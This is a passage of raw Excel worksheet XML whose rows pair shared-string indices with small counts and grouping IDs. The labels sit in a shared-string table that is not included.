      </c>
    </row>
    <row r="299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A299" t="s">
        <v>16231</v>
      </c>
      <c r="B299" t="s">
        <v>16214</v>
      </c>
      <c r="C299">
        <v>0</v>
      </c>
      <c r="D299">
        <v>1097</v>
      </c>
    </row>
    <row r="300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A300" t="s">
        <v>16228</v>
      </c>
      <c r="B300" t="s">
        <v>16215</v>
      </c>
      <c r="C300">
        <v>1</v>
      </c>
      <c r="D300">
        <v>1097</v>
      </c>
    </row>
    <row r="301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A301" t="s">
        <v>16231</v>
      </c>
      <c r="B301" t="s">
        <v>16216</v>
      </c>
      <c r="C301">
        <v>2</v>
      </c>
      <c r="D301">
        <v>1097</v>
      </c>
    </row>
    <row r="302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A302" t="s">
        <v>16228</v>
      </c>
      <c r="B302" t="s">
        <v>16217</v>
      </c>
      <c r="C302">
        <v>8</v>
      </c>
      <c r="D302">
        <v>1097</v>
      </c>
    </row>
    <row r="303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A303" t="s">
        <v>16231</v>
      </c>
      <c r="B303" t="s">
        <v>16218</v>
      </c>
      <c r="C303">
        <v>1</v>
      </c>
      <c r="D303">
        <v>1097</v>
      </c>
    </row>
    <row r="304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A304" t="s">
        <v>16229</v>
      </c>
      <c r="B304" t="s">
        <v>16219</v>
      </c>
      <c r="C304">
        <v>0</v>
      </c>
      <c r="D304">
        <v>1097</v>
      </c>
    </row>
    <row r="305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A305" t="s">
        <v>16230</v>
      </c>
      <c r="B305" t="s">
        <v>16220</v>
      </c>
      <c r="C305">
        <v>0</v>
      </c>
      <c r="D305">
        <v>1097</v>
      </c>
    </row>
    <row r="306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A306" t="s">
        <v>16229</v>
      </c>
      <c r="B306" t="s">
        <v>16221</v>
      </c>
      <c r="C306">
        <v>28</v>
      </c>
      <c r="D306">
        <v>1097</v>
      </c>
    </row>
    <row r="307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A307" t="s">
        <v>16230</v>
      </c>
      <c r="B307" t="s">
        <v>16222</v>
      </c>
      <c r="C307">
        <v>16</v>
      </c>
      <c r="D307">
        <v>1097</v>
      </c>
    </row>
    <row r="308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A308" t="s">
        <v>16223</v>
      </c>
      <c r="B308" t="s">
        <v>16223</v>
      </c>
      <c r="C308">
        <v>25</v>
      </c>
      <c r="D308">
        <v>1097</v>
      </c>
    </row>
    <row r="309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A309" t="s">
        <v>16224</v>
      </c>
      <c r="B309" t="s">
        <v>16224</v>
      </c>
      <c r="C309">
        <v>1</v>
      </c>
      <c r="D309">
        <v>1097</v>
      </c>
    </row>
    <row r="310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A310" t="s">
        <v>16228</v>
      </c>
      <c r="B310" t="s">
        <v>16211</v>
      </c>
      <c r="C310">
        <v>1</v>
      </c>
      <c r="D310">
        <v>306</v>
      </c>
    </row>
    <row r="311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A311" t="s">
        <v>16231</v>
      </c>
      <c r="B311" t="s">
        <v>16216</v>
      </c>
      <c r="C311">
        <v>6</v>
      </c>
      <c r="D311">
        <v>306</v>
      </c>
    </row>
    <row r="312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A312" t="s">
        <v>16228</v>
      </c>
      <c r="B312" t="s">
        <v>16217</v>
      </c>
      <c r="C312">
        <v>29</v>
      </c>
      <c r="D312">
        <v>306</v>
      </c>
    </row>
    <row r="313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A313" t="s">
        <v>16231</v>
      </c>
      <c r="B313" t="s">
        <v>16218</v>
      </c>
      <c r="C313">
        <v>55</v>
      </c>
      <c r="D313">
        <v>306</v>
      </c>
    </row>
    <row r="314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A314" t="s">
        <v>16229</v>
      </c>
      <c r="B314" t="s">
        <v>16221</v>
      </c>
      <c r="C314">
        <v>12</v>
      </c>
      <c r="D314">
        <v>306</v>
      </c>
    </row>
    <row r="315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A315" t="s">
        <v>16230</v>
      </c>
      <c r="B315" t="s">
        <v>16222</v>
      </c>
      <c r="C315">
        <v>139</v>
      </c>
      <c r="D315">
        <v>306</v>
      </c>
    </row>
    <row r="316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A316" t="s">
        <v>16228</v>
      </c>
      <c r="B316" t="s">
        <v>16211</v>
      </c>
      <c r="C316">
        <v>0</v>
      </c>
      <c r="D316">
        <v>2325</v>
      </c>
    </row>
    <row r="317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A317" t="s">
        <v>16231</v>
      </c>
      <c r="B317" t="s">
        <v>16212</v>
      </c>
      <c r="C317">
        <v>0</v>
      </c>
      <c r="D317">
        <v>2325</v>
      </c>
    </row>
    <row r="318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A318" t="s">
        <v>16228</v>
      </c>
      <c r="B318" t="s">
        <v>16213</v>
      </c>
      <c r="C318">
        <v>0</v>
      </c>
      <c r="D318">
        <v>2325</v>
      </c>
    </row>
    <row r="319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A319" t="s">
        <v>16231</v>
      </c>
      <c r="B319" t="s">
        <v>16214</v>
      </c>
      <c r="C319">
        <v>0</v>
      </c>
      <c r="D319">
        <v>2325</v>
      </c>
    </row>
    <row r="320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A320" t="s">
        <v>16228</v>
      </c>
      <c r="B320" t="s">
        <v>16215</v>
      </c>
      <c r="C320">
        <v>1</v>
      </c>
      <c r="D320">
        <v>2325</v>
      </c>
    </row>
    <row r="321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A321" t="s">
        <v>16231</v>
      </c>
      <c r="B321" t="s">
        <v>16216</v>
      </c>
      <c r="C321">
        <v>2</v>
      </c>
      <c r="D321">
        <v>2325</v>
      </c>
    </row>
    <row r="322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A322" t="s">
        <v>16228</v>
      </c>
      <c r="B322" t="s">
        <v>16217</v>
      </c>
      <c r="C322">
        <v>0</v>
      </c>
      <c r="D322">
        <v>2325</v>
      </c>
    </row>
    <row r="323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A323" t="s">
        <v>16231</v>
      </c>
      <c r="B323" t="s">
        <v>16218</v>
      </c>
      <c r="C323">
        <v>0</v>
      </c>
      <c r="D323">
        <v>2325</v>
      </c>
    </row>
    <row r="324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A324" t="s">
        <v>16229</v>
      </c>
      <c r="B324" t="s">
        <v>16219</v>
      </c>
      <c r="C324">
        <v>0</v>
      </c>
      <c r="D324">
        <v>2325</v>
      </c>
    </row>
    <row r="325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A325" t="s">
        <v>16230</v>
      </c>
      <c r="B325" t="s">
        <v>16220</v>
      </c>
      <c r="C325">
        <v>0</v>
      </c>
      <c r="D325">
        <v>2325</v>
      </c>
    </row>
    <row r="326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A326" t="s">
        <v>16229</v>
      </c>
      <c r="B326" t="s">
        <v>16221</v>
      </c>
      <c r="C326">
        <v>0</v>
      </c>
      <c r="D326">
        <v>2325</v>
      </c>
    </row>
    <row r="327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A327" t="s">
        <v>16230</v>
      </c>
      <c r="B327" t="s">
        <v>16222</v>
      </c>
      <c r="C327">
        <v>0</v>
      </c>
      <c r="D327">
        <v>2325</v>
      </c>
    </row>
    <row r="328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A328" t="s">
        <v>16223</v>
      </c>
      <c r="B328" t="s">
        <v>16223</v>
      </c>
      <c r="C328">
        <v>0</v>
      </c>
      <c r="D328">
        <v>2325</v>
      </c>
    </row>
    <row r="329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A329" t="s">
        <v>16224</v>
      </c>
      <c r="B329" t="s">
        <v>16224</v>
      </c>
      <c r="C329">
        <v>0</v>
      </c>
      <c r="D329">
        <v>2325</v>
      </c>
    </row>
    <row r="330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A330" t="s">
        <v>16228</v>
      </c>
      <c r="B330" t="s">
        <v>16217</v>
      </c>
      <c r="C330">
        <v>3</v>
      </c>
      <c r="D330">
        <v>2325</v>
      </c>
    </row>
    <row r="331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A331" t="s">
        <v>16231</v>
      </c>
      <c r="B331" t="s">
        <v>16218</v>
      </c>
      <c r="C331">
        <v>3</v>
      </c>
      <c r="D331">
        <v>2325</v>
      </c>
    </row>
    <row r="332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A332" t="s">
        <v>16230</v>
      </c>
      <c r="B332" t="s">
        <v>16220</v>
      </c>
      <c r="C332">
        <v>2</v>
      </c>
      <c r="D332">
        <v>2325</v>
      </c>
    </row>
    <row r="333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A333" t="s">
        <v>16229</v>
      </c>
      <c r="B333" t="s">
        <v>16221</v>
      </c>
      <c r="C333">
        <v>15</v>
      </c>
      <c r="D333">
        <v>2325</v>
      </c>
    </row>
    <row r="334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A334" t="s">
        <v>16230</v>
      </c>
      <c r="B334" t="s">
        <v>16222</v>
      </c>
      <c r="C334">
        <v>5</v>
      </c>
      <c r="D334">
        <v>2325</v>
      </c>
    </row>
    <row r="335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A335" t="s">
        <v>16223</v>
      </c>
      <c r="B335" t="s">
        <v>16223</v>
      </c>
      <c r="C335">
        <v>25</v>
      </c>
      <c r="D335">
        <v>2325</v>
      </c>
    </row>
    <row r="336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A336" t="s">
        <v>16224</v>
      </c>
      <c r="B336" t="s">
        <v>16224</v>
      </c>
      <c r="C336">
        <v>1</v>
      </c>
      <c r="D336">
        <v>2325</v>
      </c>
    </row>
    <row r="337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A337" t="s">
        <v>16228</v>
      </c>
      <c r="B337" t="s">
        <v>16211</v>
      </c>
      <c r="C337">
        <v>0</v>
      </c>
      <c r="D337">
        <v>1381</v>
      </c>
    </row>
    <row r="338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A338" t="s">
        <v>16231</v>
      </c>
      <c r="B338" t="s">
        <v>16212</v>
      </c>
      <c r="C338">
        <v>0</v>
      </c>
      <c r="D338">
        <v>1381</v>
      </c>
    </row>
    <row r="339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A339" t="s">
        <v>16228</v>
      </c>
      <c r="B339" t="s">
        <v>16213</v>
      </c>
      <c r="C339">
        <v>0</v>
      </c>
      <c r="D339">
        <v>1381</v>
      </c>
    </row>
    <row r="340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A340" t="s">
        <v>16231</v>
      </c>
      <c r="B340" t="s">
        <v>16214</v>
      </c>
      <c r="C340">
        <v>0</v>
      </c>
      <c r="D340">
        <v>1381</v>
      </c>
    </row>
    <row r="341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A341" t="s">
        <v>16228</v>
      </c>
      <c r="B341" t="s">
        <v>16215</v>
      </c>
      <c r="C341">
        <v>0</v>
      </c>
      <c r="D341">
        <v>1381</v>
      </c>
    </row>
    <row r="342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A342" t="s">
        <v>16231</v>
      </c>
      <c r="B342" t="s">
        <v>16216</v>
      </c>
      <c r="C342">
        <v>0</v>
      </c>
      <c r="D342">
        <v>1381</v>
      </c>
    </row>
    <row r="343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A343" t="s">
        <v>16228</v>
      </c>
      <c r="B343" t="s">
        <v>16217</v>
      </c>
      <c r="C343">
        <v>0</v>
      </c>
      <c r="D343">
        <v>1381</v>
      </c>
    </row>
    <row r="344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A344" t="s">
        <v>16231</v>
      </c>
      <c r="B344" t="s">
        <v>16218</v>
      </c>
      <c r="C344">
        <v>0</v>
      </c>
      <c r="D344">
        <v>1381</v>
      </c>
    </row>
    <row r="345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A345" t="s">
        <v>16229</v>
      </c>
      <c r="B345" t="s">
        <v>16219</v>
      </c>
      <c r="C345">
        <v>0</v>
      </c>
      <c r="D345">
        <v>1381</v>
      </c>
    </row>
    <row r="346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A346" t="s">
        <v>16230</v>
      </c>
      <c r="B346" t="s">
        <v>16220</v>
      </c>
      <c r="C346">
        <v>0</v>
      </c>
      <c r="D346">
        <v>1381</v>
      </c>
    </row>
    <row r="347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A347" t="s">
        <v>16229</v>
      </c>
      <c r="B347" t="s">
        <v>16221</v>
      </c>
      <c r="C347">
        <v>0</v>
      </c>
      <c r="D347">
        <v>1381</v>
      </c>
    </row>
    <row r="348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A348" t="s">
        <v>16230</v>
      </c>
      <c r="B348" t="s">
        <v>16222</v>
      </c>
      <c r="C348">
        <v>0</v>
      </c>
      <c r="D348">
        <v>1381</v>
      </c>
    </row>
    <row r="349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A349" t="s">
        <v>16223</v>
      </c>
      <c r="B349" t="s">
        <v>16223</v>
      </c>
      <c r="C349">
        <v>0</v>
      </c>
      <c r="D349">
        <v>1381</v>
      </c>
    </row>
    <row r="350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A350" t="s">
        <v>16224</v>
      </c>
      <c r="B350" t="s">
        <v>16224</v>
      </c>
      <c r="C350">
        <v>0</v>
      </c>
      <c r="D350">
        <v>1381</v>
      </c>
    </row>
    <row r="351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A351" t="s">
        <v>16228</v>
      </c>
      <c r="B351" t="s">
        <v>16215</v>
      </c>
      <c r="C351">
        <v>6</v>
      </c>
      <c r="D351">
        <v>1381</v>
      </c>
    </row>
    <row r="352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A352" t="s">
        <v>16231</v>
      </c>
      <c r="B352" t="s">
        <v>16216</v>
      </c>
      <c r="C352">
        <v>11</v>
      </c>
      <c r="D352">
        <v>1381</v>
      </c>
    </row>
    <row r="353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A353" t="s">
        <v>16228</v>
      </c>
      <c r="B353" t="s">
        <v>16217</v>
      </c>
      <c r="C353">
        <v>40</v>
      </c>
      <c r="D353">
        <v>1381</v>
      </c>
    </row>
    <row r="354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A354" t="s">
        <v>16223</v>
      </c>
      <c r="B354" t="s">
        <v>16223</v>
      </c>
      <c r="C354">
        <v>28</v>
      </c>
      <c r="D354">
        <v>1381</v>
      </c>
    </row>
    <row r="355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A355" t="s">
        <v>16224</v>
      </c>
      <c r="B355" t="s">
        <v>16224</v>
      </c>
      <c r="C355">
        <v>2</v>
      </c>
      <c r="D355">
        <v>1381</v>
      </c>
    </row>
    <row r="356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A356" t="s">
        <v>16228</v>
      </c>
      <c r="B356" t="s">
        <v>16211</v>
      </c>
      <c r="C356">
        <v>0</v>
      </c>
      <c r="D356">
        <v>1687</v>
      </c>
    </row>
    <row r="357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A357" t="s">
        <v>16231</v>
      </c>
      <c r="B357" t="s">
        <v>16212</v>
      </c>
      <c r="C357">
        <v>0</v>
      </c>
      <c r="D357">
        <v>1687</v>
      </c>
    </row>
    <row r="358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A358" t="s">
        <v>16228</v>
      </c>
      <c r="B358" t="s">
        <v>16213</v>
      </c>
      <c r="C358">
        <v>0</v>
      </c>
      <c r="D358">
        <v>1687</v>
      </c>
    </row>
    <row r="359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A359" t="s">
        <v>16231</v>
      </c>
      <c r="B359" t="s">
        <v>16214</v>
      </c>
      <c r="C359">
        <v>0</v>
      </c>
      <c r="D359">
        <v>1687</v>
      </c>
    </row>
    <row r="360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A360" t="s">
        <v>16228</v>
      </c>
      <c r="B360" t="s">
        <v>16215</v>
      </c>
      <c r="C360">
        <v>2</v>
      </c>
      <c r="D360">
        <v>1687</v>
      </c>
    </row>
    <row r="361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A361" t="s">
        <v>16231</v>
      </c>
      <c r="B361" t="s">
        <v>16216</v>
      </c>
      <c r="C361">
        <v>2</v>
      </c>
      <c r="D361">
        <v>1687</v>
      </c>
    </row>
    <row r="362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A362" t="s">
        <v>16228</v>
      </c>
      <c r="B362" t="s">
        <v>16217</v>
      </c>
      <c r="C362">
        <v>0</v>
      </c>
      <c r="D362">
        <v>1687</v>
      </c>
    </row>
    <row r="363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A363" t="s">
        <v>16231</v>
      </c>
      <c r="B363" t="s">
        <v>16218</v>
      </c>
      <c r="C363">
        <v>0</v>
      </c>
      <c r="D363">
        <v>1687</v>
      </c>
    </row>
    <row r="364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A364" t="s">
        <v>16229</v>
      </c>
      <c r="B364" t="s">
        <v>16219</v>
      </c>
      <c r="C364">
        <v>0</v>
      </c>
      <c r="D364">
        <v>1687</v>
      </c>
    </row>
    <row r="365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A365" t="s">
        <v>16230</v>
      </c>
      <c r="B365" t="s">
        <v>16220</v>
      </c>
      <c r="C365">
        <v>0</v>
      </c>
      <c r="D365">
        <v>1687</v>
      </c>
    </row>
    <row r="366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A366" t="s">
        <v>16229</v>
      </c>
      <c r="B366" t="s">
        <v>16221</v>
      </c>
      <c r="C366">
        <v>5</v>
      </c>
      <c r="D366">
        <v>1687</v>
      </c>
    </row>
    <row r="367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A367" t="s">
        <v>16230</v>
      </c>
      <c r="B367" t="s">
        <v>16222</v>
      </c>
      <c r="C367">
        <v>5</v>
      </c>
      <c r="D367">
        <v>1687</v>
      </c>
    </row>
    <row r="368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A368" t="s">
        <v>16223</v>
      </c>
      <c r="B368" t="s">
        <v>16223</v>
      </c>
      <c r="C368">
        <v>300</v>
      </c>
      <c r="D368">
        <v>1687</v>
      </c>
    </row>
    <row r="369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A369" t="s">
        <v>16224</v>
      </c>
      <c r="B369" t="s">
        <v>16224</v>
      </c>
      <c r="C369">
        <v>1</v>
      </c>
      <c r="D369">
        <v>1687</v>
      </c>
    </row>
    <row r="370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A370" t="s">
        <v>16228</v>
      </c>
      <c r="B370" t="s">
        <v>16211</v>
      </c>
      <c r="C370">
        <v>0</v>
      </c>
      <c r="D370">
        <v>181</v>
      </c>
    </row>
    <row r="371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A371" t="s">
        <v>16231</v>
      </c>
      <c r="B371" t="s">
        <v>16212</v>
      </c>
      <c r="C371">
        <v>0</v>
      </c>
      <c r="D371">
        <v>181</v>
      </c>
    </row>
    <row r="372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A372" t="s">
        <v>16228</v>
      </c>
      <c r="B372" t="s">
        <v>16213</v>
      </c>
      <c r="C372">
        <v>0</v>
      </c>
      <c r="D372">
        <v>181</v>
      </c>
    </row>
    <row r="373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A373" t="s">
        <v>16231</v>
      </c>
      <c r="B373" t="s">
        <v>16214</v>
      </c>
      <c r="C373">
        <v>0</v>
      </c>
      <c r="D373">
        <v>181</v>
      </c>
    </row>
    <row r="374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A374" t="s">
        <v>16228</v>
      </c>
      <c r="B374" t="s">
        <v>16215</v>
      </c>
      <c r="C374">
        <v>3</v>
      </c>
      <c r="D374">
        <v>181</v>
      </c>
    </row>
    <row r="375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A375" t="s">
        <v>16231</v>
      </c>
      <c r="B375" t="s">
        <v>16216</v>
      </c>
      <c r="C375">
        <v>1</v>
      </c>
      <c r="D375">
        <v>181</v>
      </c>
    </row>
    <row r="376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A376" t="s">
        <v>16228</v>
      </c>
      <c r="B376" t="s">
        <v>16217</v>
      </c>
      <c r="C376">
        <v>20</v>
      </c>
      <c r="D376">
        <v>181</v>
      </c>
    </row>
    <row r="377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A377" t="s">
        <v>16231</v>
      </c>
      <c r="B377" t="s">
        <v>16218</v>
      </c>
      <c r="C377">
        <v>38</v>
      </c>
      <c r="D377">
        <v>181</v>
      </c>
    </row>
    <row r="378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A378" t="s">
        <v>16229</v>
      </c>
      <c r="B378" t="s">
        <v>16219</v>
      </c>
      <c r="C378">
        <v>0</v>
      </c>
      <c r="D378">
        <v>181</v>
      </c>
    </row>
    <row r="379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A379" t="s">
        <v>16230</v>
      </c>
      <c r="B379" t="s">
        <v>16220</v>
      </c>
      <c r="C379">
        <v>0</v>
      </c>
      <c r="D379">
        <v>181</v>
      </c>
    </row>
    <row r="380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A380" t="s">
        <v>16229</v>
      </c>
      <c r="B380" t="s">
        <v>16221</v>
      </c>
      <c r="C380">
        <v>0</v>
      </c>
      <c r="D380">
        <v>181</v>
      </c>
    </row>
    <row r="381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A381" t="s">
        <v>16230</v>
      </c>
      <c r="B381" t="s">
        <v>16222</v>
      </c>
      <c r="C381">
        <v>0</v>
      </c>
      <c r="D381">
        <v>181</v>
      </c>
    </row>
    <row r="382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A382" t="s">
        <v>16223</v>
      </c>
      <c r="B382" t="s">
        <v>16223</v>
      </c>
      <c r="C382">
        <v>24</v>
      </c>
      <c r="D382">
        <v>181</v>
      </c>
    </row>
    <row r="383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A383" t="s">
        <v>16224</v>
      </c>
      <c r="B383" t="s">
        <v>16224</v>
      </c>
      <c r="C383">
        <v>0</v>
      </c>
      <c r="D383">
        <v>181</v>
      </c>
    </row>
    <row r="384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A384" t="s">
        <v>16228</v>
      </c>
      <c r="B384" t="s">
        <v>16211</v>
      </c>
      <c r="C384">
        <v>0</v>
      </c>
      <c r="D384">
        <v>343</v>
      </c>
    </row>
    <row r="385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A385" t="s">
        <v>16231</v>
      </c>
      <c r="B385" t="s">
        <v>16212</v>
      </c>
      <c r="C385">
        <v>0</v>
      </c>
      <c r="D385">
        <v>343</v>
      </c>
    </row>
    <row r="386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A386" t="s">
        <v>16228</v>
      </c>
      <c r="B386" t="s">
        <v>16213</v>
      </c>
      <c r="C386">
        <v>0</v>
      </c>
      <c r="D386">
        <v>343</v>
      </c>
    </row>
    <row r="387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A387" t="s">
        <v>16231</v>
      </c>
      <c r="B387" t="s">
        <v>16214</v>
      </c>
      <c r="C387">
        <v>0</v>
      </c>
      <c r="D387">
        <v>343</v>
      </c>
    </row>
    <row r="388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A388" t="s">
        <v>16228</v>
      </c>
      <c r="B388" t="s">
        <v>16215</v>
      </c>
      <c r="C388">
        <v>21</v>
      </c>
      <c r="D388">
        <v>343</v>
      </c>
    </row>
    <row r="389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A389" t="s">
        <v>16231</v>
      </c>
      <c r="B389" t="s">
        <v>16216</v>
      </c>
      <c r="C389">
        <v>40</v>
      </c>
      <c r="D389">
        <v>343</v>
      </c>
    </row>
    <row r="390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A390" t="s">
        <v>16228</v>
      </c>
      <c r="B390" t="s">
        <v>16217</v>
      </c>
      <c r="C390">
        <v>40</v>
      </c>
      <c r="D390">
        <v>343</v>
      </c>
    </row>
    <row r="391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A391" t="s">
        <v>16231</v>
      </c>
      <c r="B391" t="s">
        <v>16218</v>
      </c>
      <c r="C391">
        <v>40</v>
      </c>
      <c r="D391">
        <v>343</v>
      </c>
    </row>
    <row r="392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A392" t="s">
        <v>16229</v>
      </c>
      <c r="B392" t="s">
        <v>16219</v>
      </c>
      <c r="C392">
        <v>1</v>
      </c>
      <c r="D392">
        <v>343</v>
      </c>
    </row>
    <row r="393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A393" t="s">
        <v>16230</v>
      </c>
      <c r="B393" t="s">
        <v>16220</v>
      </c>
      <c r="C393">
        <v>0</v>
      </c>
      <c r="D393">
        <v>343</v>
      </c>
    </row>
    <row r="394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A394" t="s">
        <v>16229</v>
      </c>
      <c r="B394" t="s">
        <v>16221</v>
      </c>
      <c r="C394">
        <v>80</v>
      </c>
      <c r="D394">
        <v>343</v>
      </c>
    </row>
    <row r="395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A395" t="s">
        <v>16230</v>
      </c>
      <c r="B395" t="s">
        <v>16222</v>
      </c>
      <c r="C395">
        <v>68</v>
      </c>
      <c r="D395">
        <v>343</v>
      </c>
    </row>
    <row r="396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A396" t="s">
        <v>16223</v>
      </c>
      <c r="B396" t="s">
        <v>16223</v>
      </c>
      <c r="C396">
        <v>6</v>
      </c>
      <c r="D396">
        <v>343</v>
      </c>
    </row>
    <row r="397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A397" t="s">
        <v>16224</v>
      </c>
      <c r="B397" t="s">
        <v>16224</v>
      </c>
      <c r="C397">
        <v>2</v>
      </c>
      <c r="D397">
        <v>343</v>
      </c>
    </row>
    <row r="398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A398" t="s">
        <v>16228</v>
      </c>
      <c r="B398" t="s">
        <v>16211</v>
      </c>
      <c r="C398">
        <v>0</v>
      </c>
      <c r="D398">
        <v>510</v>
      </c>
    </row>
    <row r="399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A399" t="s">
        <v>16231</v>
      </c>
      <c r="B399" t="s">
        <v>16212</v>
      </c>
      <c r="C399">
        <v>0</v>
      </c>
      <c r="D399">
        <v>510</v>
      </c>
    </row>
    <row r="400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A400" t="s">
        <v>16228</v>
      </c>
      <c r="B400" t="s">
        <v>16213</v>
      </c>
      <c r="C400">
        <v>0</v>
      </c>
      <c r="D400">
        <v>510</v>
      </c>
    </row>
    <row r="401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A401" t="s">
        <v>16231</v>
      </c>
      <c r="B401" t="s">
        <v>16214</v>
      </c>
      <c r="C401">
        <v>0</v>
      </c>
      <c r="D401">
        <v>510</v>
      </c>
    </row>
    <row r="402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A402" t="s">
        <v>16228</v>
      </c>
      <c r="B402" t="s">
        <v>16215</v>
      </c>
      <c r="C402">
        <v>2</v>
      </c>
      <c r="D402">
        <v>510</v>
      </c>
    </row>
    <row r="403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A403" t="s">
        <v>16231</v>
      </c>
      <c r="B403" t="s">
        <v>16216</v>
      </c>
      <c r="C403">
        <v>3</v>
      </c>
      <c r="D403">
        <v>510</v>
      </c>
    </row>
    <row r="404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A404" t="s">
        <v>16228</v>
      </c>
      <c r="B404" t="s">
        <v>16217</v>
      </c>
      <c r="C404">
        <v>4</v>
      </c>
      <c r="D404">
        <v>510</v>
      </c>
    </row>
    <row r="405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A405" t="s">
        <v>16231</v>
      </c>
      <c r="B405" t="s">
        <v>16218</v>
      </c>
      <c r="C405">
        <v>2</v>
      </c>
      <c r="D405">
        <v>510</v>
      </c>
    </row>
    <row r="406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A406" t="s">
        <v>16229</v>
      </c>
      <c r="B406" t="s">
        <v>16219</v>
      </c>
      <c r="C406">
        <v>0</v>
      </c>
      <c r="D406">
        <v>510</v>
      </c>
    </row>
    <row r="407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A407" t="s">
        <v>16230</v>
      </c>
      <c r="B407" t="s">
        <v>16220</v>
      </c>
      <c r="C407">
        <v>0</v>
      </c>
      <c r="D407">
        <v>510</v>
